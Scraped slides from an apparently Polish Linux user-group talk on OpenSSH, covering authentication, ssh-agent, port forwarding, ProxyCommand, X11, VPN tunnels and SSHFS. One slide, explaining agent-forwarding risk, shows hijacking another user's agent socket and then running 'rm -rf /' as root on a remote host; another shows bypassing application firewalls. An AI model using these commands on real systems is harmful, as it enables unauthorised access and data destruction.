openssh - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen...
TRANSCRIPT
![Page 1: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/1.jpg)
Dariusz PuchalakDariusz < at > Puchalak.net
OpenSSH
Szwajcarski scyzoryk dla Internetu.
![Page 2: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/2.jpg)
![Page 3: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/3.jpg)
History
SSH: Secure ShellCreated by Tatu Ylonen (1995)
●Secure loggin into remote computer●Authentication, encryption, integrity
![Page 4: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/4.jpg)
Why SSH?
● IP spoofing● IP source routing● DNS spoofing● Password sniffing● Manipulation of transfer data● Atack on X11 (sniffing on authorization)
![Page 5: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/5.jpg)
SSH replaces telnet
ssh host.domena.pl
ssh -l user host.domena.pl
![Page 6: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/6.jpg)
SSH replaces FTP
Podsystem SFTP
sftp host.domena.plsftp> dir
![Page 7: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/7.jpg)
SSH replaces r-command
rexecssh host "cat /etc/passwd"
rloginssh user@host
rcp:scp file host.domena.pl:
![Page 8: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/8.jpg)
Authentication
passwordpasswordpublickey (some patches to use X.509)publickey (some patches to use X.509)GSSAPI – Kerberos or NTLMGSSAPI – Kerberos or NTLMkeyboard-interactive – skey or tokenskeyboard-interactive – skey or tokens
![Page 9: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/9.jpg)
1000 and 1 passwords
bash$ ssh-keygen -b 2048 -t rsa -f testGenerating public/private rsa key pair.Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in test.Your public key has been saved in test.pub.The key fingerprint is:c4:56:cb:dc:38:fd:91:bc:b3:e0:9f:04:e5:ea:e2:08 scorpius@debian
![Page 10: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/10.jpg)
1000 and 1 passwordsssh-agent
bash$ ssh-addEnter passphrase for /home/scorpius/.ssh/id_rsa: Identity added: /home/scorpius/.ssh/id_rsa (/home/scorpius/.ssh/id_rsa)
bash$ ssh-add -l1024 73:b9:ff:34:a7:fc:6e:3f:27:66:e6:cc:61:f9:ae:10 /home/scorpius/.ssh/id_rsa (RSA)
skopiować test.pub do .ssh/authorized_keys na mszynie zdalnej
![Page 11: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/11.jpg)
Remote command execution
Synchronization of remote files using rsync over SSH
rsync -avH -e ssh hosta:2BACKUP/ ../
![Page 12: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/12.jpg)
Remote command execution
Filesystem backup over SSH
ssh "tar -cSzv --one-file-system -C / -f - ." server1 | cat > serwer1-backup-root.tar.gz
![Page 13: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/13.jpg)
Remote command execution
Moving files beetwen different filesystems:
ssh rootdp@hostA "tar -cSzv -C / -f - /u02/_installs/9iAS/" | ssh [email protected] "tar -xpSzv -C / -f -"
![Page 14: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/14.jpg)
NNTP over SSH?
LocalForward
LocalForward 1050 news.pwr.wroc.pl:119
bash$ NNTPSERVER=localhost NNTPPORT=1050 tin -r
![Page 15: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/15.jpg)
... over SSH
POP3 over SSH:LocalForward 1110 news.pwr.wroc.pl:110
SMTP over SSH:LocalForward 1025 news.pwr.wroc.pl:25
IMAP over SSH:LocalForward 1143 news.pwr.wroc.pl:143
LocalForward 10.0.0.2:25 poczta.pl:25
![Page 16: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/16.jpg)
Remote Forward
RemoteForward 65020 127.0.0.1:22
![Page 17: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/17.jpg)
GatewayPorts
GatewayPorts yes
GatewayPorts no
GatewayPorts clientspecified
![Page 18: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/18.jpg)
Your own proxy
DynamicForward 1080
Socks4/Socks5 proxy
![Page 19: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/19.jpg)
Agent forwarding
Agent forwardingssh -A host1user@host1:~$user@host1:~$ ssh host2....user@host2:~$
![Page 20: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/20.jpg)
Agent forwarding is it secure?
Agent forwarding from inside:
Need rights to read socket: /tmp/ssh-.../agent.931
Exploit:EXPORT SSH_AUTH_SOCK=/tmp/ssh-XX2aESOF/agent.931ssh-add -lssh root@hostA rm -rf / tmp/plik
![Page 21: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/21.jpg)
Better way
SSH - proxycommand.ssh/config...Host hostB ProxyCommand ssh hostA nc %h %pHost hostA HostName 172.16.48.10...
bash$ ssh hostB
![Page 22: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/22.jpg)
Proxy Command 2
Bypassing aplication firewalls:
ProxyCommand nc -X connect -x 192.168.1.1:8080 %h %p
![Page 23: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/23.jpg)
X11 forwarding over SSH
ssh -X user@host netscape
Trusted X11 forwarding:ssh -Y user@host
Host lefthand Hostname 192.168.1.99 User lfmk ForwardX11 yes
![Page 24: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/24.jpg)
OpenSSH VPN
Host sshgatewayTunnel yesTunnelDevice 0:anyPermitLocalCommand yesLocalCommand sh /etc/netstart tun0
![Page 25: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/25.jpg)
SSH i croncommand="cat /etc/passwd" ssh-rsa AAAA[.............]sagSH kluczyk123
from=”serverA.net”idle-timeout=5mno-agent-forwardingno-port-forwardingno-X11-forwardingno-ptypermitopen=”hostB.domain:12345”tunnel=”n”
![Page 26: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/26.jpg)
SSHFS
Network filesystem using SSH(Needs FUSE)
![Page 27: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/27.jpg)
Reusing Control Connection
Host * ControlMaster auto ControlPath /tmp/%r@%h:%p
![Page 28: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/28.jpg)
Summary
Types of tuneling:
● LocalForward● RemoteForward● DynamicForward● ProxyCommand● ForwardX11/ForwardX11Trusted● Tunnel ● ControlMaster
![Page 29: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/29.jpg)
Security
● ssh-agent● X11● GatewayPorts● MITM● SSH-1.99● SSH timing attack
![Page 30: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/30.jpg)
Questions?
![Page 31: OpenSSH - linux.gda.pllinux.gda.pl/spotkania/sp_29/ssh.pdf · 1000 and 1 passwords bash$ ssh-keygen -b 2048 -t rsa -f test Generating public/private rsa key pair. Enter passphrase](https://reader030.vdocuments.mx/reader030/viewer/2022040416/5d1493a688c993b80f8bdcc6/html5/thumbnails/31.jpg)
Thank you.
http://docs.probosit.pl/SSH